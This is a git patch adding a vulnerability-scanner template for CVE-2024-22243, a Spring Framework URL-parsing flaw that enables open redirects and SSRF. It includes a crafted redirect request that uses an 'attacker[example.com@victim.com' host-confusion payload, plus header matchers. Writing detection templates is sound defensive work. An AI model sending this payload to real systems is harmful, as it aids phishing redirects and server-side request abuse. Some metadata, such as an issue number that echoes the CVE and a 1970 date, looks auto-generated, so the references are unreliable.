From accb9498cee90981aea3d8b9d8576a2137171368 Mon Sep 17 00:00:00 2001
From: Anonymous <bot@projectdiscovery.io>
Date: Thu, 1 Jan 1970 00:00:00 +0000
Subject: [PATCH] Added template for CVE-2024-22243

---
 CVE-2024-22243.yaml | 56 +++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 56 insertions(+)
 create mode 100644 CVE-2024-22243.yaml

diff --git a/CVE-2024-22243.yaml b/CVE-2024-22243.yaml
new file mode 100644
index 00000000000..c7a47df3244
--- /dev/null
+++ b/CVE-2024-22243.yaml
@@ -0,0 +1,56 @@
+id: CVE-2024-22243
+info:
+  name: URL Parsing Vulnerability in Java Spring Framework
+  author: Sean Pesce
+  severity: high
+  description: |
+    A URL-parsing vulnerability in the Java Spring Framework that affects certain versions.
+    This issue arises from a specific regex in the UriComponentsBuilder class, leading to
+    unexpected host name extraction. This can cause security flaws like open redirects or
+    SSRF if trusted host names are used for authorization.
+  remediation: |
+    Upgrade to a patched version of the Spring Framework where this vulnerability is resolved.
+    Avoid using the vulnerable methods for parsing URLs, or implement custom validation to
+    ensure the host name extracted is as expected. Regularly review and update dependencies to 
+    prevent such vulnerabilities.
+  reference:
+    - https://github.com/spring-projects/spring-framework/issues/22243
+    - https://security.netapp.com/advisory/ntap-20240524-0001/
+    - https://spring.io/security/cve-2024-22243
+    - http://seclists.org/fulldisclosure/2024/Sep/24
+    - https://github.com/hinat0y/Dataset1
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
+    cvss-score: 8.1
+    cve-id: CVE-2024-22243
+    cwe-id: CWE-601
+    epss-score: 0.00061
+    epss-percentile: 0.27896
+
+http:
+  - raw:
+      - |
+        GET /redirect?url=http://attacker%5Bexample.com@victim.com/ HTTP/1.1
+        Host: {{Hostname}}
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 302
+      - type: word
+        part: header
+        words:
+          - "Location: http://attacker%5Bexample.com@victim.com/"
+      - type: regex
+        part: body
+        regex:
+          - "http://victim.com"   # Detects the incorrect parsing of the host name
+      - type: word
+        part: header
+        words:
+          - "Location: http://"  # Matching any external redirection URL pattern
+      - type: word
+        part: header
+        words:
+          - "Location: http://attacker%5Bexample.com@"  # Specifically targeting crafted attacker URL
+